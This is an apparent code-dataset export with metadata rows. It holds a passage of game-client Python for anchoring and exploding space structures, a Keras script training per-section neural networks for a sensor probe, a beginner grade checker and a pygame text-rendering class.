                duration = (end - start) / const.SEC
                elapsed = duration - max(end - blue.os.GetWallclockTime(), 0L) / const.SEC
            else:
                duration = 0
                elapsed = 0
            self.state = item.state
            self.timer = item.timer
            self.GotoState(STATES[self.state], duration, elapsed)
        # Refit if the set of module IDs with a renderable graphic differs
        # from what is currently fitted.
        if set([ i[0] for i in item.modules or [] if evetypes.GetGraphicID(i[1]) is not None ]) != set(self.modules.keys()):
            uthread.new(self.ReloadHardpoints)
    def OnDamageState(self, damageState):
        """Forward (shield, armor, hull) damage fractions to the model."""
        BuildableStructure.OnDamageState(self, damageState)
        if self.model is not None and damageState is not None:
            # Treat missing layer values as undamaged (0.0).
            states = [ (d if d is not None else 0.0) for d in damageState ]
            self.model.SetImpactDamageState(states[0], states[1], states[2], False)
    def GotoState(self, state, totalTime = 0, elapsedTime = 0):
        """Dispatch the visual transition for *state* on a worker tasklet."""
        if state == STATE_CONSTRUCT:
            uthread.new(self.BuildStructure, float(totalTime), float(elapsedTime))
        elif state == STATE_DECONSTRUCT:
            uthread.new(self.TearDownStructure, float(totalTime), float(elapsedTime))
        else:
            uthread.new(self.LoadModelWithState, state)
    def LoadModelWithState(self, newState):
        """Ensure the model is loaded, then play the animation for newState."""
        if self.model is None:
            self.LoadModel()
        self.TriggerAnimation(newState)
        self.FitHardpoints()
        self.StartStructureLoopAnimation()
    def LoadModel(self, fileName = None, loadedModel = None):
        # fileName/loadedModel are ignored; the structure model comes from
        # the buildable-structure machinery.
        self.model = self.GetStructureModel()
        self.SetAnimationSequencer(self.model)
        self.NotifyModelLoaded()
    def ReloadHardpoints(self):
        """Drop and refit all turret hardpoints (module list changed)."""
        self.UnfitHardpoints()
        self.FitHardpoints()
    def UnfitHardpoints(self):
        """Remove turret entries from self.modules and clear self.turrets."""
        if not self.fitted:
            return
        self.logger.debug('Unfitting hardpoints')
        # Keep only non-turret module entries.
        newModules = {}
        for key, val in self.modules.iteritems():
            if val not in self.turrets:
                newModules[key] = val
        self.modules = newModules
        del self.turrets[:]
        self.fitted = False
    def FitHardpoints(self, blocking = False):
        """Attach turret models to the structure model (idempotent)."""
        if self.fitted:
            return
        if self.model is None:
            self.logger.warning('FitHardpoints - No model')
            return
        self.logger.debug('Fitting hardpoints')
        self.fitted = True
        newTurretSetDict = TurretSet.FitTurrets(self.id, self.model, self.typeData.get('sofFactionName', None))
        self.turrets = []
        for key, val in newTurretSetDict.iteritems():
            self.modules[key] = val
            self.turrets.append(val)
    def LookAtMe(self):
        # Lazily fit hardpoints when the camera focuses on this structure.
        if not self.model:
            return
        if not self.fitted:
            self.FitHardpoints()
    def StopStructureLoopAnimation(self):
        """Fade out the idle loop animation layer, if the model has one."""
        animationUpdater = self.GetStructureModel().animationUpdater
        if animationUpdater is not None:
            animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 1, 0, 1, True)
    def StartStructureLoopAnimation(self):
        """Fade in the idle loop animation layer, if the model has one."""
        animationUpdater = self.GetStructureModel().animationUpdater
        if animationUpdater is not None:
            animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 0, 0, 1, True)
    def BuildStructure(self, anchoringTime, elapsedTime):
        """Play the anchoring animation, resuming at elapsedTime seconds."""
        self.LoadUnLoadedModels()
        self.logger.debug('Structure: BuildStructure %s', self.GetTypeID())
        self.PreBuildingSteps()
        # Schedule completion for the remaining animation time (ms).
        delay = int((anchoringTime - elapsedTime) * 1000)
        uthread.new(self._EndStructureBuild, delay)
        self.TriggerAnimation(STATE_CONSTRUCT, curveLength=anchoringTime, elapsedTime=elapsedTime)
    def _EndStructureBuild(self, delay):
        # Runs on its own tasklet; finalize the build after *delay* ms.
        blue.pyos.synchro.SleepSim(delay)
        if self.released or self.exploded:
            return
        self.StartStructureLoopAnimation()
        self.PostBuildingSteps(True)
        self.LoadModel()
    def TearDownStructure(self, unanchoringTime, elapsedTime):
        """Play the unanchoring animation, resuming at elapsedTime seconds."""
        self.LoadUnLoadedModels()
        self.logger.debug('Structure: TearDownStructure %s', self.GetTypeID())
        self.StopStructureLoopAnimation()
        self.PreBuildingSteps()
        # Schedule completion for the remaining animation time (ms).
        delay = int((unanchoringTime - elapsedTime) * 1000)
        uthread.new(self._EndStructureTearDown, delay)
        self.TriggerAnimation(STATE_DECONSTRUCT, curveLength=unanchoringTime, elapsedTime=elapsedTime)
    def _EndStructureTearDown(self, delay):
        # Runs on its own tasklet; swap to the nano-container model when done.
        blue.pyos.synchro.SleepSim(delay)
        if self.released or self.exploded:
            return
        self.PostBuildingSteps(False)
        self.model = self.GetNanoContainerModel()
    def Explode(self, explosionURL = None, scaling = 1.0, managed = False, delay = 0.0):
        """Play the explosion effect and return the wreck-switch delay.

        Arguments other than the ball itself are ignored when explosion
        buckets are enabled; otherwise the explosion info is looked up and
        a client-side explosion ball is played at the structure position.
        """
        if SpaceObjectExplosionManager.USE_EXPLOSION_BUCKETS:
            self.logger.debug('Exploding with explosion bucket')
            scene = sm.GetService('space').GetScene()
            wreckSwitchTime, _, __ = SpaceObjectExplosionManager.ExplodeBucketForBall(self, scene)
            return wreckSwitchTime
        explosionURL, (delay, _) = self.GetExplosionInfo()
        explosionLocatorSets = None
        if hasattr(self.model, 'locatorSets'):
            explosionLocatorSets = self.model.locatorSets.FindByName('explosions')
        rotation = self.GetStaticRotation()
        self.explosionManager.PlayClientSideExplosionBall(explosionURL, (self.x, self.y, self.z), rotation, explosionLocatorSets)
        return delay
| [
"le02005@163.com"
] | le02005@163.com |
ee057d853429be5c3457c783108df7d6c1a9aee6 | 29ae5c73f2e94d406aa814a946863e48d559ac87 | /Model training/SNNTrainingScript.py | 2bb029b732d2e69902ea5789e3c489a6df3e65b5 | [] | no_license | Zhi-Yih-Lim/DOB-Scan_Probe | 28884221759129a951f93b691085aeecc242a101 | 7676e2d8e0525792f5854a37ae695b0eaaccc35a | refs/heads/main | 2023-05-02T18:59:55.661889 | 2021-05-28T08:15:00 | 2021-05-28T08:15:00 | 371,195,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,742 | py | import numpy as np
import os
from ConstructTrainNTarget4Training import TrainNTargetValues # Module that divides the training data from .csv format to input and target values
from SNN import SingleLayerNeuralNet # Module that returns a "model" object from keras, to be used for model training (single layered neural network in this case)
from SNNTwoLayer import DoubleLayerNeuralNet # Module that returns a "model" object from keras, to be used for model training (double layered neural network in this case)
from sklearn.model_selection import train_test_split
import tensorflow as tf
import keras
from keras import backend as K
def TrainSNN(TrainingParam):
    """Train one shallow neural network per sensor section and save weights.

    The 128-pixel sensor is split into overlapping sections. Sections in the
    first half use the first LED's training data ("i690" files); the mirror
    sections use the second LED's data ("ii690" files). For every section a
    fresh model is trained, the best weights (lowest validation error) are
    checkpointed to a folder hierarchy encoding the hyper-parameters, and the
    minimum validation error per section is written to MinError.csv.

    Args:
        TrainingParam: dict with keys InputPerSection, OverlappingPixels,
            Path2i690TrainingData, Path2ii690TrainingData, Path2SaveWeights,
            Loss ("MAP Error" or "MS Error"), Activation, ActivationDisp,
            FirstLayerHiddenUnits, SecondLayerHiddenUnits (0 => one hidden
            layer), Epochs, NoOfOutput.

    Side effects: creates directories, appends SectionInformation.txt files,
    writes .h5 weight files and a MinError.csv.
    """

    def _ensure_dir(path):
        # Create *path* if needed and return it, so directory levels chain.
        if not os.path.exists(path):
            os.makedirs(path)
        return path

    def _loss_metrics_monitor(loss_name):
        # Map the user-facing loss name onto keras loss/metric objects and
        # the validation-history key monitored by the checkpoint callback.
        if loss_name == "MAP Error":
            return (keras.losses.MeanAbsolutePercentageError(),
                    keras.metrics.MeanAbsolutePercentageError(),
                    "val_mean_absolute_percentage_error")
        elif loss_name == "MS Error":
            return (keras.losses.MeanSquaredError(),
                    keras.metrics.MeanSquaredError(),
                    "val_mean_squared_error")
        raise ValueError("Unsupported loss: {}".format(loss_name))

    # Pixel shift between consecutive sections and total section count.
    pxlShift = TrainingParam["InputPerSection"] - TrainingParam["OverlappingPixels"]
    ttlSection = int((128 - TrainingParam["OverlappingPixels"]) // pxlShift)
    # Minimum validation error per section for the current settings.
    sectErr = np.zeros((1, ttlSection))
    pat2NumberOfHiddenUnits = None

    for section in range(ttlSection):
        if section <= int(ttlSection // 2):
            # First LED: data section index matches the loop index.
            dataSection = section
            dataPath = TrainingParam["Path2i690TrainingData"]
            weightPrefix = "i690"
        else:
            # Second LED: mirror the section index and switch data files.
            dataSection = ttlSection - section - 1
            dataPath = TrainingParam["Path2ii690TrainingData"]
            weightPrefix = "ii690"

        # Build input/target arrays for this section and split off 5%
        # validation data (fixed seed for reproducibility).
        trainIn, trainTgt = TrainNTargetValues(dataSection, pxlShift, TrainingParam["InputPerSection"], dataPath)
        X_train, X_valid, Y_train, Y_valid = train_test_split(trainIn, trainTgt, test_size=0.05, random_state=3)

        # Folder hierarchy: loss / activation / inputs / overlap / depth /
        # width / section. Each level is created on demand.
        path = _ensure_dir(TrainingParam["Path2SaveWeights"] + "\\{}".format(TrainingParam["Loss"]))
        path = _ensure_dir(path + "\\{}".format(TrainingParam["ActivationDisp"]))
        path = _ensure_dir(path + "\\{} Input".format(TrainingParam["InputPerSection"]))
        path = _ensure_dir(path + "\\{} Overlap".format(TrainingParam["OverlappingPixels"]))
        oneHidden = TrainingParam["SecondLayerHiddenUnits"] == 0
        if oneHidden:
            path = _ensure_dir(path + "\\OneHidden")
            pat2NumberOfHiddenUnits = _ensure_dir(path + "\\{} Hidden First".format(TrainingParam["FirstLayerHiddenUnits"]))
        else:
            path = _ensure_dir(path + "\\TwoHidden")
            pat2NumberOfHiddenUnits = _ensure_dir(path + "\\{} First {} Second".format(TrainingParam["FirstLayerHiddenUnits"], TrainingParam["SecondLayerHiddenUnits"]))
        pat2SectionFold = _ensure_dir(pat2NumberOfHiddenUnits + "\\Section {}".format(section + 1))

        # Record the provenance of this section's training data.
        with open(pat2SectionFold + "\\SectionInformation.txt", "a") as f:
            f.write("Currently in section {}, Csv file used for training is {}, The indeces used for training are {}".format(dataSection, dataPath, [i + 2 for i in range((dataSection * pxlShift), (dataSection * pxlShift) + TrainingParam["InputPerSection"])]))

        # Weight file name encodes the LED prefix, the data section and the
        # overall section number (all 1-based).
        pat2Weight = pat2SectionFold + "\\{}{}Section{}.h5".format(weightPrefix, dataSection + 1, section + 1)

        loss, metrics, callbackMonitorQuality = _loss_metrics_monitor(TrainingParam["Loss"])

        # Checkpoint only the best (minimum validation error) weights.
        checkpoint_callback = keras.callbacks.ModelCheckpoint(
            filepath=pat2Weight,
            save_weights_only=True,
            verbose=1,
            monitor=callbackMonitorQuality,
            mode='min',
            save_best_only=True)

        # Build a fresh model for this section.
        if oneHidden:
            tempMod = SingleLayerNeuralNet(InputsPerSection=TrainingParam["InputPerSection"], HiddenUnits=TrainingParam["FirstLayerHiddenUnits"], Activation=TrainingParam["Activation"], Optimizer=keras.optimizers.Adam(lr=0.01), Loss=loss, Metrics=metrics, NoOutput=TrainingParam["NoOfOutput"])
        else:
            tempMod = DoubleLayerNeuralNet(InputsPerSection=TrainingParam["InputPerSection"], FirstLayerHiddenUnits=TrainingParam["FirstLayerHiddenUnits"], SecondLayerHiddenUnits=TrainingParam["SecondLayerHiddenUnits"], Activation=TrainingParam["Activation"], Optimizer=keras.optimizers.Adam(lr=0.01), Loss=loss, Metrics=metrics, NoOutput=TrainingParam["NoOfOutput"])

        # Train with half the training set per batch.
        history = tempMod.model.fit(X_train, Y_train, batch_size=int(X_train.shape[0] // 2), epochs=TrainingParam["Epochs"], validation_data=(X_valid, Y_valid), callbacks=[checkpoint_callback])
        sectErr[0, section] = min(history.history[callbackMonitorQuality])
        # Free the keras graph/session before the next section's model.
        K.clear_session()

    # After all sections have been trained, save the per-section errors
    # beside the weight folders of the (last used) hidden-unit setting.
    np.savetxt(pat2NumberOfHiddenUnits + "\\MinError.csv", sectErr, delimiter=",")
"noreply@github.com"
] | Zhi-Yih-Lim.noreply@github.com |
2bb65b8fa96ba90a308d56213ff899750b9f85db | 3b0c9017c88a9f1fe6c0f4312257c1f849f99a67 | /Assignment 2 - Decisions and Booleans/Grade.py | 562fb7ffa5f87659433f2e94065178784000a21d | [] | no_license | Theodora17/PROG-2019 | ac4c0e4d8e891248415589860194303b11d2eba4 | d701916295dfe1131e61f7118e79b74d64acb283 | refs/heads/master | 2020-07-19T22:38:16.754856 | 2019-09-05T11:42:38 | 2019-09-05T11:42:38 | 206,525,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | grade = float(input("Input a grade: ")) # Do not change this line
# Fill in the missing code below
# Valid grades are in [0.0, 10.0]; 5.0 and above passes.
if 0.0 <= grade <= 10.0:
    if grade >= 5.0:
        print("Passing grade!") # Do not change this line
    else:
        # grade is in [0.0, 5.0) here, so no further comparison is needed
        # (the original `elif grade <= 5.0` was always true when reached).
        print("Failing grade!") # Do not change this line
else:
    print("Invalid grade!") # Do not change this line
"34063081+Theodora17@users.noreply.github.com"
] | 34063081+Theodora17@users.noreply.github.com |
92df8935229dd8eaf991c49b79ae9e82a8809421 | 6e133ed08b0380c513aa99624161b25311d6fc68 | /text_image.py | cdf66f6a0bce794a3bed3f0c919afbeccb8a4ae2 | [] | no_license | jamescarr0/flappy_unicorn | 75a5dc71c73036695bc92cf2443d335ae74a9f49 | 49e9e729d5c6d66cc8234626c713f03a177576ee | refs/heads/master | 2022-10-04T04:41:42.636987 | 2020-06-10T19:40:36 | 2020-06-10T19:40:36 | 270,330,775 | 0 | 0 | null | 2020-06-09T11:09:34 | 2020-06-07T14:26:36 | Python | UTF-8 | Python | false | false | 1,014 | py | import pygame
class TextImage:
    """Render a string to a pygame image, initially centered on the screen."""

    def __init__(self, screen, text, size, text_color=(237, 93, 183)):
        """Render *text* with the unicorn font and center it on *screen*.

        Args:
            screen: pygame display surface the image will be blitted onto.
            text: string to render.
            size: font point size.
            text_color: RGB tuple for the text (defaults to pink).
        """
        self.screen = screen
        self.screen_rect = self.screen.get_rect()
        self.text = text
        self.text_color = text_color
        self.font = pygame.font.Font('fonts/UnicornMagic-OVML6.ttf', size)
        self.text_img = self._render_text().convert_alpha()
        self.rect = self.text_img.get_rect()
        # Start at the center of the screen; change_position offsets from here.
        self.rect.center = self.screen_rect.center

    def _render_text(self):
        """Render self.text (antialiased) and return the resulting surface.

        Note: the original declared an unused *text varargs parameter; it was
        never passed by any caller and has been removed.
        """
        return self.font.render(self.text, True, self.text_color)

    def change_position(self, width, height):
        """Offset the rect in place by (width, height) pixels.

        The starting point is the center of the screen.
        """
        self.rect.move_ip(width, height)

    def blit_me(self):
        """Draw the rendered text image to the screen at its current rect."""
        self.screen.blit(self.text_img, self.rect)
| [
"jamescarr0@hotmail.com"
] | jamescarr0@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.